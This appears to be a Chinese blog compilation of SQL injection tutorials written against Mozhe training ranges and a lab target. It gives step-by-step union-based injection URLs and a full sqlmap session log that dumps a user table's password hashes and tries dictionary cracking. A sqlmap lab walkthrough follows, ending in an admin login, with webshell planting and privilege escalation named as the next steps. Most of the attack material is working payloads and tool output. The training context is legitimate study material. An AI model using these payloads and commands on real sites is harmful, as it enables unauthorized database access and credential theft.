整体思路:
类似做法(slqilabs注入示例):
第一步:测试是否存在注入点 1 and 1=1 正常 1 and 1=2 错误 第二步:判断列名数量 1 order by 4 正常 1 order by 5 错误 为4个 报错查看列名情况: -1 union select 1,2,3,4 显示 2,3 从2,3查询 查看版本,数据库名信息: -1 union select 1,version(),database(),4 查询表名:-1 union select 1,table_name ,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 查询列名: -1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='表名' 继续:union 1,select name,password,4 from StormGroup_member limit 1,1 解密:MD5
如何去判断SQL注入漏洞
- and 1=1 / and 1=2 回显页面不同(整形判断)
- 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)
- (转义符)
- -1/+1 回显下一个或上一个页面(整型判断)
- and sleep(5) (判断页面返回时间)
人工搞:
原文链接:https://blog.csdn.net/qq_43623470/article/details/86506985
在这里插入图片描述
1,http://219.153.49.228:48730/new_list.php?id=1 and 1=1 不报错
http://219.153.49.228:48730/new_list.php?id=1 and 1=2 报错,发现注入点
2,http://219.153.49.228:48730/new_list.php?id=1 order by 5
使用order by 查询 ,发现到5是报错,说明不大于5
SQL语句‘order by’ 后面直接加数字的含义
select * from table order by n
n 表示select里面的第n个字段,整段sql的意义是:查询出来的结果,按照第N个字段排序
3,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,2,3,4
使用联合查询,返回在2和3
在这里插入图片描述
4,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,database(),version(),4
查询数据库名称和版本
在这里插入图片描述
5,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1
查询数据库,使用limit0,1表示从第0行开始取1行数据。
在这里插入图片描述
6,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
查询数据库,使用limit0,1表示从第1行开始取1行数据。
在这里插入图片描述
7,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 2,1
查询数据库,使用limit0,1表示从第2行开始取1行数据。
在这里插入图片描述
8,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1
查询数据库,使用limit0,1表示从第3行开始取1行数据。
在这里插入图片描述
9,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1
查询数据库,使用limit0,1表示从第4行开始取1行数据。在这里插入图片描述
10,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’ limit 0,1
查询mozhe_Discuz_StormGroup的数据库的表的名字,从第0行取一行数据
在这里插入图片描述
11,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’ limit 1,1
查询mozhe_Discuz_StormGroup的数据库的表的名字,从第1行取一行数据
在这里插入图片描述
12,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name=‘StormGroup_member’ limit 0,1
查询StormGroup_member的表的字段内容,从第0行取一行数据
在这里插入图片描述
13,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name=‘StormGroup_member’ limit 1,1
在这里插入图片描述
14,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name=‘StormGroup_member’ limit 2,1
在这里插入图片描述
15,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,column_name,column_type,4 from information_schema.columns where table_name=‘StormGroup_member’ limit 3,1
在这里插入图片描述
16,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,concat(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1
在这里插入图片描述
17,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,concat(name,’-’,password,’-’,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1
在这里插入图片描述
————————————————
补充:SQL UNION 操作符
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。
请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。
SQL UNION 语法
SELECT column_name(s) FROM table_name1 UNION SELECT column_name(s) FROM table_name2
注释:默认地,UNION 操作符选取不同的值。如果允许重复的值,请使用 UNION ALL。
SQL UNION ALL 语法
SELECT column_name(s) FROM table_name1 UNION ALL SELECT column_name(s) FROM table_name2
另外,UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。
下面的例子中使用的原始表:
Employees_China:
E_ID | E_Name |
---|---|
01 | Zhang, Hua |
02 | Wang, Wei |
03 | Carter, Thomas |
04 | Yang, Ming |
Employees_USA:
E_ID | E_Name |
---|---|
01 | Adams, John |
02 | Bush, George |
03 | Carter, Thomas |
04 | Gates, Bill |
使用 UNION 命令
实例
列出所有在中国和美国的不同的雇员名:
SELECT E_Name FROM Employees_China
UNION
SELECT E_Name FROM Employees_USA
结果
E_Name |
---|
Zhang, Hua |
Wang, Wei |
Carter, Thomas |
Yang, Ming |
Adams, John |
Bush, George |
Gates, Bill |
注释:这个命令无法列出在中国和美国的所有雇员。在上面的例子中,我们有两个名字相同的雇员,他们当中只有一个人被列出来了。UNION 命令只会选取不同的值。
墨者学院--SQL手工注入漏洞测试(MySQL数据库)
题目地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
一、第一步就是要找注入口
主要的方法就是 先口的注入先试试,试完之后如果没有注入口,那么就查看源代码,然后利用源代码去找href的标签
二、确定注入的类型
字符型 OR 数字型 鉴别的方法在我的收藏sql注入的文章有
确定了本文的注入为数字型
三、正式注入
1、先确定字段的数量
union select 1,2,3,4
判断字段数量为4
(超4报错)
2、看4个字段中那个字段会回显
这时要用-1进行注入-1 union select 1,2,3,4
3、可以查看 database()、version()
不过似乎没什么用
4、直接开始查看表名
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
- 1
5、查看段名(爆表内字段)
-1 union select 1,gropu_concat(conlumn),2,3 from information_schma.columns where table_name = '这里面填的表的名字
6、直接爆完
-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member
拿到账号密码
使用工具:
我的操作:
bogon:~ $ sqlmap -u http://219.153.49.228:43844/new_list.php?id=1 ___ __H__ ___ ___[,]_____ ___ ___ {1.5.4#stable} |_ -| . ["] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:38:32 /2021-06-14/ [11:38:33] [INFO] testing connection to the target URL [11:38:33] [INFO] checking if the target is protected by some kind of WAF/IPS [11:38:33] [INFO] testing if the target URL content is stable [11:38:33] [INFO] target URL content is stable [11:38:33] [INFO] testing if GET parameter 'id' is dynamic [11:38:33] [INFO] GET parameter 'id' appears to be dynamic [11:38:34] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable [11:38:34] [INFO] testing for SQL injection on GET parameter 'id' [11:38:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [11:38:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="平台将于2018年12月31日00:00至2019年1月1日12:00(12小时)进行停机升级,升级期间系统将停止对内对外服务,禁止业务人员等所有用户进行系统操作,如仍在系统升级期间进行操作,所带来的影响后果自行负责,给您工作带来不便,敬请谅解。") [11:38:35] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [11:39:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [11:39:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [11:39:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [11:39:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [11:39:06] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [11:39:06] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [11:39:06] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [11:39:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [11:39:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [11:39:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [11:39:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [11:39:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [11:39:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [11:39:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [11:39:07] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [11:39:07] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' [11:39:07] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' [11:39:07] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' [11:39:07] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [11:39:07] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' [11:39:07] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' [11:39:07] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' [11:39:07] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [11:39:07] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [11:39:07] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [11:39:07] [INFO] testing 'Generic inline queries' [11:39:08] [INFO] testing 'MySQL inline queries' [11:39:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [11:39:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [11:39:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [11:39:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [11:39:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [11:39:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [11:39:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [11:39:18] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [11:39:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [11:39:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [11:39:18] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [11:39:19] [INFO] target URL appears to have 4 columns in query [11:39:19] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable sqlmap identified the following injection point(s) with a total of 79 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5888=5888 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3559 FROM (SELECT(SLEEP(5)))NAfv) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-2741 UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6b71,0x457a4762794c66674f4e5343424369744f72624161764b6d6942776d595644454366485a76705567,0x7176786271),NULL-- - --- [11:40:13] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.10.3 back-end DBMS: MySQL >= 5.0.12 [11:40:14] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 57 times [11:40:14] [INFO] fetched data logged to text files under '/Users//.local/share/sqlmap/output/219.153.49.228' [*] ending @ 11:40:14 /2021-06-14/ bogon:~ $ sqlmap -u http://219.153.49.228:43844/new_list.php?id=1 --current-db ___ __H__ ___ ___[)]_____ ___ ___ {1.5.4#stable} |_ -| . [,] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:40:54 /2021-06-14/ [11:40:54] [INFO] resuming back-end DBMS 'mysql' [11:40:54] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5888=5888 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3559 FROM (SELECT(SLEEP(5)))NAfv) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-2741 UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6b71,0x457a4762794c66674f4e5343424369744f72624161764b6d6942776d595644454366485a76705567,0x7176786271),NULL-- - --- [11:40:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.10.3 back-end DBMS: MySQL >= 5.0.12 [11:40:54] [INFO] fetching current database current database: 'mozhe_Discuz_StormGroup' [11:40:54] [INFO] fetched data logged to text files under '/Users//.local/share/sqlmap/output/219.153.49.228' [*] ending @ 11:40:54 /2021-06-14/ bogon:~ $ sqlmap -u http://219.153.49.228:43844/new_list.php?id=1 --dbs ___ __H__ ___ ___[,]_____ ___ ___ {1.5.4#stable} |_ -| . [)] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:41:21 /2021-06-14/ [11:41:21] [INFO] resuming back-end DBMS 'mysql' [11:41:21] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5888=5888 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3559 FROM (SELECT(SLEEP(5)))NAfv) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-2741 UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6b71,0x457a4762794c66674f4e5343424369744f72624161764b6d6942776d595644454366485a76705567,0x7176786271),NULL-- - --- [11:41:21] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.10.3 back-end DBMS: MySQL >= 5.0.12 [11:41:21] [INFO] fetching database names available databases [5]: [*] information_schema [*] mozhe_Discuz_StormGroup [*] mysql [*] performance_schema [*] sys [11:41:22] [INFO] fetched data logged to text files under '/Users//.local/share/sqlmap/output/219.153.49.228' [*] ending @ 11:41:22 /2021-06-14/ bogon:~ $ sqlmap -u http://219.153.49.228:43844/new_list.php?id=1 -D mozhe_Discuz_StormGroup --tables ___ __H__ ___ ___[.]_____ ___ ___ {1.5.4#stable} |_ -| . [(] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:41:47 /2021-06-14/ [11:41:47] [INFO] resuming back-end DBMS 'mysql' [11:41:47] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5888=5888 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3559 FROM (SELECT(SLEEP(5)))NAfv) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-2741 UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6b71,0x457a4762794c66674f4e5343424369744f72624161764b6d6942776d595644454366485a76705567,0x7176786271),NULL-- - --- [11:41:47] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.10.3 back-end DBMS: MySQL >= 5.0.12 [11:41:47] [INFO] fetching tables for database: 'mozhe_Discuz_StormGroup' Database: mozhe_Discuz_StormGroup [2 tables] +-------------------+ | StormGroup_member | | notice | +-------------------+ [11:41:47] [INFO] fetched data logged to text files under '/Users//.local/share/sqlmap/output/219.153.49.228' [*] ending @ 11:41:47 /2021-06-14/ bogon:~ $ sqlmap -u http://219.153.49.228:43844/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T StormGroup_member --columns ___ __H__ ___ ___[']_____ ___ ___ {1.5.4#stable} |_ -| . [,] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:42:21 /2021-06-14/ [11:42:21] [INFO] resuming back-end DBMS 'mysql' [11:42:21] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5888=5888 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3559 FROM (SELECT(SLEEP(5)))NAfv) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-2741 UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6b71,0x457a4762794c66674f4e5343424369744f72624161764b6d6942776d595644454366485a76705567,0x7176786271),NULL-- - --- [11:42:21] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.10.3 back-end DBMS: MySQL >= 5.0.12 [11:42:21] [INFO] fetching columns for table 'StormGroup_member' in database 'mozhe_Discuz_StormGroup' Database: mozhe_Discuz_StormGroup Table: StormGroup_member [4 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | id | int(11) | | name | varchar(20) | | password | varchar(255) | | status | int(11) | +----------+--------------+ [11:42:22] [INFO] fetched data logged to text files under '/Users//.local/share/sqlmap/output/219.153.49.228' [*] ending @ 11:42:22 /2021-06-14/ bogon:~ $ sqlmap -u http://219.153.49.228:43844/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T StormGroup_member --columns -C id,name,password,status --dump ___ __H__ ___ ___["]_____ ___ ___ {1.5.4#stable} |_ -| . ["] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:42:53 /2021-06-14/ [11:42:53] [INFO] resuming back-end DBMS 'mysql' [11:42:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5888=5888 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 3559 FROM (SELECT(SLEEP(5)))NAfv) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-2741 UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6b71,0x457a4762794c66674f4e5343424369744f72624161764b6d6942776d595644454366485a76705567,0x7176786271),NULL-- - --- [11:42:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.10.3 back-end DBMS: MySQL >= 5.0.12 [11:42:53] [INFO] fetching columns 'id, name, password, status' for table 'StormGroup_member' in database 'mozhe_Discuz_StormGroup' Database: mozhe_Discuz_StormGroup Table: StormGroup_member [4 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | id | int(11) | | name | varchar(20) | | password | varchar(255) | | status | int(11) | +----------+--------------+ [11:42:53] [INFO] fetching entries of column(s) 'id,name,password,status' for table 'StormGroup_member' in database 'mozhe_Discuz_StormGroup' [11:42:53] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further proces do you want to crack them via a dictionary-based attack? [Y/n/q] [11:43:18] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/local/Cellar/sqlmap/1.5.4/libexec/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > [11:43:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] [11:43:25] [INFO] starting dictionary-based cracking (md5_generic_passwd) [11:43:25] [INFO] starting 4 processes [11:43:43] [WARNING] no clear password(s) found Database: mozhe_Discuz_StormGroup Table: StormGroup_member [2 entries] +----+-------+----------------------------------+--------+ | id | name | password | status | +----+-------+----------------------------------+--------+ | 1 | mozhe | 356f589a7df439f6f744ff19bb8092c0 | 0 | | 1 | mozhe | f7d547b46f11294dba10d3a5cb70ea22 | 1 | +----+-------+----------------------------------+--------+ [11:43:43] [INFO] table 'mozhe_Discuz_StormGroup.StormGroup_member' dumped to CSV file '/Users//.local/share/sqlmap/output/219.153.49.228/dump/mozhe_Discuz_StormGroup/StormGroup_member.csv' [11:43:43] [INFO] fetched data logged to text files under '/Users//.local/share/sqlmap/output/219.153.49.228' [*] ending @ 11:43:43 /2021-06-14/
sqlmap 使用教程
见:https://www.jianshu.com/p/65d7522ecc1f
检查注入点:
sqlmap -u http://aa.com/star_photo.php?artist_id=11
爆所有数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs
爆当前数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db
指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables
'vhost48330' 为指定数据库名称
指定库名表名列出所有字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
'admin' 为指定表名称
指定库名表名字段dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
'ac,id,password' 为指定字段名称
实验目的:
学会使用sqlmap并完成一次sql注入。
实验工具:
sqlmap、火狐浏览器
实验环境:
服务器一台(Windows server 2003)
客户机一台(Windows server 2003)、目标地址:http://aa.com/wcms/show.php?id=33
实验步骤:
-
第一步:打开目标地址,先手工检查一下是否存在注入点。
http://aa.com/wcms/show.php?id=33页面正常
http://aa.com/wcms/show.php?id=33'正常报错
说明存在注入漏洞。下面进行sqlmap注入。 -
第二步:使用sqlmap判断一下是否存在注入漏洞(主要是看能否返回信息)
python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3
- 第三步:获取数据库信息。
python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 --dbs
获取所有数据库信息
- python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 --current-db
获取当前数据库信息
由于靶机环境搭建了不同的网站和应用,用的都是同一个数据库,因此显示的会把整个mysql的所有数据库名都显示出来。目标网站用的是cms这个库。
第四步:指定库名列出所有表
- python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms --tables
进一步获取到了cms库所有的表,我们更关注cms_users这个表。根据经验,这里面存储着后台的管理账号和密码。
- 第五步:指定库名表名列出所有字段。
-python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms -T cms_users --columns
查出了3个字段,password,userid,username。理论上password、和username分别存储着密码和用户名。
- 第六步:指定库名表名字段列出指定字段
python.exe sqlmap/sqlmap.py -u http://aa.com/wcms/show.php?id=3 -D cms -T cms_users -C username,password --dump
在执行过程中,会需要我们属于选择一下y或者n,默认的是大写选项,默认即可(一直按Enter键即可);主要是sqlmap调用本地字典库进行简单的md5暴力破解。我们最后获取到了用户名和密码,分别是 admin 和123456。
第七步:在后台登陆一下。至于后台的查找,我们可以通过御剑这款专业的后台查找工具,后续实验中会有详细的介绍,这里不再赘述。
http://aa.com/wcms/admin/login.php
输入用户名和密码 admin 123456
登陆成功。
关于sqlmap的入侵整个实验过程已经结束,后续的工作就是挂马提权,这些内容也会在后续的实验中进行详细的介绍。
别人家的孩子
https://www.jianshu.com/p/4fb15a2c9040